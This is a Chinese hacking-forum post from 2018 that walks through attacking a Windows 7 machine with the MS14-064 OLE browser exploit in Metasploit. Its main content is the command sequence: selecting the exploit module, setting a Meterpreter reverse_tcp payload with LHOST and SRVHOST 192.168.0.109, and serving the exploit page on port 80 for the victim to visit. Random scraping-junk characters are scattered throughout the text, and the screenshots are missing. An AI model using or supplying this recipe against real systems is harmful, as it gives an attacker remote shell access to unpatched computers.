找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1402|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! h0 t" v- ^- ~( J+ A5 U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示5 }! J4 r/ G" m* T4 u- s

! L+ m' I& w; F; {+ V

4 @# F: J* R6 n# r: S/ c7 a1 J 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ) P6 B; y- M- M/ b3 S

8 L, N5 f. O: v1 B3 F

* P8 M; I$ f9 k' j! M 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp d. w0 X/ v0 E$ Q$ k, l3 ?3 b+ m

, G) Z' t" P0 l. l' o

8 ]8 U+ j) ?, g. P- w' ~             set AllowPowershellPrompt true - f" |' c: h& L \+ q+ m9 Z! |

; a2 Z9 j2 ~$ m0 N( q

% F" x' ^- A3 a, O. F* W             Set LHOST 192.168.0.109 . }5 W4 ~( ~+ B' a% Z4 h+ z

+ d. | l) R" D

. _) y8 S- W0 w- \6 l( U S             set SRVHOST 192.168.0.1093 H: ~- U" @/ G9 t1 T; a: t" H

# Y2 d+ U" U- d5 I) U* O& r

P2 `$ O* I7 F( L S* X5 ^! q/ c             Set uripath share 4 h0 ?, M* y) o2 S. S3 _$ `$ K' u

/ L8 b8 A% b% b" J( Y# z& k

! Z0 Y2 w- \& [+ e& F             Set srvport 80 0 o- r2 [* Q6 W( I' j& l/ t$ ~

@5 l' x% D- I, O" D

/ [0 m* A- C& T+ ~( {6 _8 J   / N: U+ C, q* p# m1 k

6 S# Z f1 E% w* ]' @

0 c+ j3 K9 `- Z  ) K( v w' m; |/ }7 A, u

6 U4 } s' w z/ G+ R2 i

! g# k+ d1 |1 p' i! O+ h   1 f, | X0 ~) S

4 E# V7 S3 B9 `) G* ^

. B+ O5 C% s5 \1 ]7 m  . k/ Q6 c' G ^- S. y( \

E: I8 E# Q0 t/ W: |$ R/ b5 X

: G h* [( R6 N, M; O5 y   ( ?2 V* ` p6 b- x. Q8 p

. x' A' U! [- J8 J$ y

9 [/ b; Q3 g2 @# w$ x 下面我们来访问本地地址如图:* ^: Y4 r; q, B* y( M+ Y

; C8 R, _/ D5 g8 d- y$ m

$ G& _6 Q# Y# z S) H- P3 O   $ { T# W+ R' |$ ~/ D9 J+ w z

! W# [ f( s- M# h/ r4 h2 o

+ u. |( _* _. z7 Y! P   4 C& u+ I4 y# X

+ ?% G V% V/ V5 o( L

. }7 ?8 V* u0 q! ~4 Y * Q8 K/ J; w: }' f* R' Z+ \3 ]1 T

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表